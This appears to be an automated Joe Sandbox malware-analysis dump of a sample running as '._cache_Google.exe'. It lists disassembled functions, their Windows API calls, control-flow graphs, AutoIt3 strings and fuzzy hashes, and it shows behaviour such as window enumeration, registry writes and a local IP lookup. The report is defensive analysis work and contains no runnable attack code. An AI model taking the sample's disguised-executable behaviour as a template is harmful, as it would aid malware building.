                                                                                                                                                                                      Function 00936A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00936C73
                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00936CB4
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00936CDD
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00936CE4
                                                                                                                                                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00936CF7
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00936D1A
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00936D23
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00936D2C
                                                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 00936D5C
                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00936DC6
                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 00936DEC
                                                                                                                                                                                      • __chsize_nolock.LIBCMT ref: 00936E1C
                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00936E2E
                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00936F26
                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00936F3B
                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 00936F9B
                                                                                                                                                                                        • Part of subcall function 0092F84C: CloseHandle.KERNEL32(00000000,009AEEC4,00000000,?,00936DF1,009AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0092F89C
                                                                                                                                                                                        • Part of subcall function 0092F84C: GetLastError.KERNEL32(?,00936DF1,009AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0092F8A6
                                                                                                                                                                                        • Part of subcall function 0092F84C: __free_osfhnd.LIBCMT ref: 0092F8B3
                                                                                                                                                                                        • Part of subcall function 0092F84C: __dosmaperr.LIBCMT ref: 0092F8D5
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00936FBD
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009370F2
                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00937111
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0093711E
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00937125
                                                                                                                                                                                      • __free_osfhnd.LIBCMT ref: 00937145
                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00937173
                                                                                                                                                                                      • __wsopen_helper.LIBCMT ref: 0093718D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 3896587723-2766056989
                                                                                                                                                                                      • Opcode ID: f4cafbd605ddb6f132cd17c51cd33b9788bdd2a05a2d7f38e12114cbfd70f923
                                                                                                                                                                                      • Instruction ID: a44ea13bd5777ea66c0a61579ca09e2501586b9c509717e8bf8c9a37730ba30f
                                                                                                                                                                                      • Opcode Fuzzy Hash: f4cafbd605ddb6f132cd17c51cd33b9788bdd2a05a2d7f38e12114cbfd70f923
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17225971908105ABEF299FA8DC51BBEBB78EF40320F248629E561EB2D1C7398D50DF51
                                                                                                                                                                                      Function 009476DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 009476ED
                                                                                                                                                                                      • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00947713
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00947741
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094774C
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00947762
                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0094776D
                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00947789
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 009477D2
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 009477D9
                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00947804
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                      • API String ID: 699586101-1459072770
                                                                                                                                                                                      • Opcode ID: d24e24deae9c73fcacc991fcbb0a67e9525998b15acccee8c772aaa47fc8ee69
                                                                                                                                                                                      • Instruction ID: b3050434c91d659fb9b0a29a8c5bb59dda6df2acbedcc7e43d59a9e2a15f4fda
                                                                                                                                                                                      • Opcode Fuzzy Hash: d24e24deae9c73fcacc991fcbb0a67e9525998b15acccee8c772aaa47fc8ee69
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A4117B1904214BAEB04F7A4AC87FBFB7ACDFD5724F100055F900A6193FB649A50D7A1
                                                                                                                                                                                      Function 00901F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 608 901f04-901f9c call 902d1a * 2 call 90c935 * 2 call 907e53 call 90d3d2 * 3 625 901fa2-901fa6 608->625 626 972569-972575 call 922626 608->626 628 97257d-972583 call 93e4ea 625->628 629 901fac-901faf 625->629 626->628 632 97258f-97259b call 90a4f6 628->632 631 901fb5-901fb8 629->631 629->632 631->632 634 901fbe-901fc7 GetForegroundWindow call 90200a 631->634 640 9725a1-9725b1 call 90a4f6 632->640 641 972899-97289d 632->641 639 901fcc-901fe3 call 90197e 634->639 654 901fe4-902007 call 905cd3 * 3 639->654 640->641 651 9725b7-9725c5 640->651 643 97289f-9728a6 call 90c935 641->643 644 9728ab-9728ae 641->644 643->644 649 9728b7-9728c4 644->649 650 9728b0 644->650 652 9728d6-9728da 649->652 653 9728c6-9728d4 call 90b8a7 CharUpperBuffW 649->653 650->649 655 9725c9-9725e1 call 93d68d 651->655 657 9728f1-9728fa 652->657 658 9728dc-9728df 652->658 653->652 655->641 671 9725e7-9725f7 call 91f885 655->671 663 9728fc-972909 GetDesktopWindow EnumChildWindows 657->663 664 97290b EnumWindows 657->664 658->657 662 9728e1-9728ef call 90b8a7 CharUpperBuffW 658->662 662->657 668 972911-972930 call 93e44e call 902d1a 663->668 664->668 683 972932-97293b call 90200a 668->683 684 972940 668->684 681 9725fd-97260d call 91f885 671->681 682 97287b-97288b call 91f885 671->682 692 972613-972623 call 91f885 681->692 693 972861-972871 call 91f885 681->693 690 972873-972876 682->690 691 97288d-972891 682->691 683->684 691->654 695 972897 691->695 701 97281d-972836 call 9488a2 IsWindow 692->701 702 972629-972639 call 91f885 692->702 693->690 700 972842-972848 GetForegroundWindow 693->700 698 972852-972858 695->698 698->693 704 972849-972850 call 90200a 700->704 701->654 711 97283c-972840 701->711 709 97263b-972640 702->709 710 972659-972669 call 91f885 702->710 704->698 713 972646-972657 call 905cf6 709->713 714 97280d-97280f 709->714 720 97266b-972675 710->720 721 97267a-97268a call 91f885 710->721 711->704 722 97269b-9726a7 call 905be9 713->722 717 972817-972818 714->717 717->654 723 9727e6-9727f0 call 90c935 720->723 729 9726b5-9726c5 call 91f885 721->729 730 97268c-972698 call 905cf6 721->730 733 972811-972813 722->733 734 9726ad-9726b0 722->734 732 972804-972808 723->732 739 9726c7-9726de call 922241 729->739 740 9726e3-9726f3 call 91f885 729->740 730->722 732->655 733->717 734->732 739->732 745 9726f5-97270c call 922241 740->745 746 972711-972721 call 91f885 740->746 745->732 751 972723-97273a call 922241 746->751 752 97273f-97274f call 91f885 746->752 751->732 757 972751-972768 call 922241 752->757 758 97276d-97277d call 91f885 752->758 757->732 763 972795-9727a5 call 91f885 758->763 764 97277f-972793 call 922241 758->764 769 9727a7-9727b7 call 91f885 763->769 770 9727c3-9727d3 call 91f885 763->770 764->732 769->690 775 9727bd-9727c1 769->775 776 9727d5-9727da 770->776 777 9727f2-972802 call 93d614 770->777 775->732 779 972815 776->779 780 9727dc-9727e2 776->780 777->690 777->732 779->717 780->723
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00901FBE
                                                                                                                                                                                      • IsWindow.USER32(?), ref: 0097282E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Foreground_memmove
                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                      • API String ID: 3828923867-1919597938
                                                                                                                                                                                      • Opcode ID: 7260a2b263d5632aa337caec71fc0952579a8004bded7d9b1a4372e6c09ebb32
                                                                                                                                                                                      • Instruction ID: 68bc64c5765c8dd28fd6d177c4385cf4f5672285a38bf6cf124a93f62b98c22c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7260a2b263d5632aa337caec71fc0952579a8004bded7d9b1a4372e6c09ebb32
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CD10431104302EFCB18EF24C490BEABBA5FF94354F148A2DF45A571A1DB31E999CB92
                                                                                                                                                                                      Function 0096352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 782 96352a-963569 call 90d3d2 * 3 789 963574-9635e7 call 9084a6 call 963d7b call 963af7 782->789 790 96356b-96356e 782->790 804 963612-963617 789->804 805 9635e9-9635f4 call 94d7e4 789->805 790->789 791 9635f9-96360d call 912570 790->791 798 963a94-963ab7 call 905cd3 * 3 791->798 808 96366d 804->808 809 963619-96362e RegConnectRegistryW 804->809 805->791 813 963671-96369c RegCreateKeyExW 808->813 810 963667-96366b 809->810 811 963630-963662 call 907ba9 call 94d7e4 call 912570 809->811 810->813 811->798 816 9636e7-9636ec 813->816 817 96369e-9636d2 call 907ba9 call 94d7e4 call 912570 813->817 819 9636f2-963715 call 9084a6 call 921bc7 816->819 820 963a7b-963a8c RegCloseKey 816->820 817->798 838 9636d8-9636e2 RegCloseKey 817->838 836 963796-9637b6 call 9084a6 call 921bc7 819->836 837 963717-96376d call 9084a6 call 9218fb call 9084a6 * 2 RegSetValueExW 819->837 820->798 823 963a8e-963a92 RegCloseKey 820->823 823->798 847 963840-963860 call 9084a6 call 921bc7 836->847 848 9637bc-963814 call 9084a6 call 9218fb call 9084a6 * 2 RegSetValueExW 836->848 837->820 859 963773-963791 call 907ba9 call 912570 837->859 838->798 864 963866-9638c9 call 9084a6 call 92010a call 9084a6 call 903b1e 847->864 865 963949-963969 call 9084a6 call 921bc7 847->865 848->820 879 96381a-96383b call 907ba9 call 912570 848->879 880 963a74 859->880 899 9638cb-9638d0 864->899 900 9638e9-963918 call 9084a6 RegSetValueExW 864->900 884 9639c6-9639e6 call 9084a6 call 921bc7 865->884 885 96396b-96398b call 90cdb4 call 9084a6 865->885 879->820 880->820 905 963a13-963a30 call 9084a6 call 921bc7 884->905 906 9639e8-963a0e call 90d00b call 9084a6 884->906 902 96398d-9639a1 RegSetValueExW 885->902 903 9638d2-9638d4 899->903 904 9638d8-9638db 899->904 917 96393d-963944 call 92017e 900->917 918 96391a-963936 call 907ba9 call 912570 900->918 902->820 908 9639a7-9639c1 call 907ba9 call 912570 902->908 903->904 904->899 910 9638dd-9638df 904->910 931 963a67-963a71 call 912570 905->931 932 963a32-963a60 call 94be47 call 9084a6 call 94be8a 905->932 906->902 908->880 910->900 915 9638e1-9638e5 910->915 915->900 917->820 918->917 931->880 932->931
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00963626
                                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,0099DBF0,00000000,?,00000000,?,?), ref: 00963694
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009636DC
                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00963765
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00963A85
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00963A92
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                                      • Opcode ID: 3398ebe1a3f72b58d8d15e9147378ef5c1bd8b285b46f91b0e119323f4521dee
                                                                                                                                                                                      • Instruction ID: 2bd311166182a11a215a81ef9f2a01c7af7ed7bd88dac79f8f08a96f9f2d9913
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3398ebe1a3f72b58d8d15e9147378ef5c1bd8b285b46f91b0e119323f4521dee
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41024B75604611AFCB14EF24C995E2AB7E9FF89720F05855DF88A9B3A2DB30ED01CB41
                                                                                                                                                                                      Function 00902F58 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00902F8B
                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00902FB5
                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00902FC6
                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00902FE3
                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00902FF3
                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00903009
                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903018
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$37o
                                                                                                                                                                                      • API String ID: 2914291525-1329995504
                                                                                                                                                                                      • Opcode ID: d9726e190fd6f7634a2df7f30db347f973f0276e288f7d7185f77a96f9886a29
                                                                                                                                                                                      • Instruction ID: 5b2392ce9e0ad46588d2a2d201d9bf6882756aaeb18e6669cdb91be6865d12d2
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9726e190fd6f7634a2df7f30db347f973f0276e288f7d7185f77a96f9886a29
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC21D0B5D29308AFEB009FA4E889BCDBBF4FB09700F00411AE611A62A0D7B04584AF95
                                                                                                                                                                                      Function 00904257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 0090428C
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                        • Part of subcall function 00921BC7: __wcsicmp_l.LIBCMT ref: 00921C50
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 009043C0
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0097214E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\._cache_Google.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                                      • API String ID: 861526374-3952963691
                                                                                                                                                                                      • Opcode ID: 25a0749640b49e9cef9f7a9a7e2eed45f8302b255dc8897b224233e03684534d
                                                                                                                                                                                      • Instruction ID: 5d84d1182e4a4b10a4fa5336b46978c3c90f355468c874875ae8b2e7ac5cc088
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25a0749640b49e9cef9f7a9a7e2eed45f8302b255dc8897b224233e03684534d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75818FB2904119AECB04EBE0DD92FEF77BCAF95354F500019F641B70D2EB646A44CBA2
                                                                                                                                                                                      Function 009478EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1096 9478ee-947911 WSAStartup 1097 947917-947938 gethostname gethostbyname 1096->1097 1098 9479b1-9479bd call 921943 1096->1098 1097->1098 1100 94793a-947941 1097->1100 1106 9479be-9479c1 1098->1106 1102 947943 1100->1102 1103 94794e-947950 1100->1103 1107 947945-94794c 1102->1107 1104 947961-9479a6 call 91faa0 inet_ntoa call 923220 call 948553 call 921943 call 92017e 1103->1104 1105 947952-94795f call 921943 1103->1105 1112 9479a9-9479af WSACleanup 1104->1112 1105->1112 1107->1103 1107->1107 1112->1106
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                                                                                      • Opcode ID: abb00523f0a37a7091c1bf6a6c093296a79d2edb51d545a885077b25f0451bdd
                                                                                                                                                                                      • Instruction ID: aae776207493989cfc641d1bd493cddd03dd35a59e3e966c78642a37dcfc6209
                                                                                                                                                                                      • Opcode Fuzzy Hash: abb00523f0a37a7091c1bf6a6c093296a79d2edb51d545a885077b25f0451bdd
                                                                                                                                                                                      • Instruction Fuzzy Hash: C311E772908119ABDB24A7B4AC45FDE776CEF80720F000065F445A6195EF74DA858760
                                                                                                                                                                                      Function 0091E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0091EA39
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0091EA56
                                                                                                                                                                                        • Part of subcall function 0092297D: __wsplitpath_helper.LIBCMT ref: 009229BD
                                                                                                                                                                                      • _wcsncat.LIBCMT ref: 0091EA69
                                                                                                                                                                                      • __makepath.LIBCMT ref: 0091EA85
                                                                                                                                                                                        • Part of subcall function 00922BFF: __wmakepath_s.LIBCMT ref: 00922C13
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0091EABE
                                                                                                                                                                                        • Part of subcall function 0091EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0091EADA,?,?), ref: 0091EB27
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 009732FC
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00973334
                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00973370
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                                                      • String ID: Include$\
                                                                                                                                                                                      • API String ID: 1213536620-3429789819
                                                                                                                                                                                      • Opcode ID: a022aa50cfddfe200d666895179e8e7004463b6cbab0500b7615a0bb52963173
                                                                                                                                                                                      • Instruction ID: a5a35a7cddd35650e51dc617880d829f7b5f261e937ed6bfbf0ee654386de470
                                                                                                                                                                                      • Opcode Fuzzy Hash: a022aa50cfddfe200d666895179e8e7004463b6cbab0500b7615a0bb52963173
                                                                                                                                                                                      • Instruction Fuzzy Hash: A95181B28183809FC314EF59EC85D9BB7E8FB8D700B80491EF545C72A2EB749644DB66
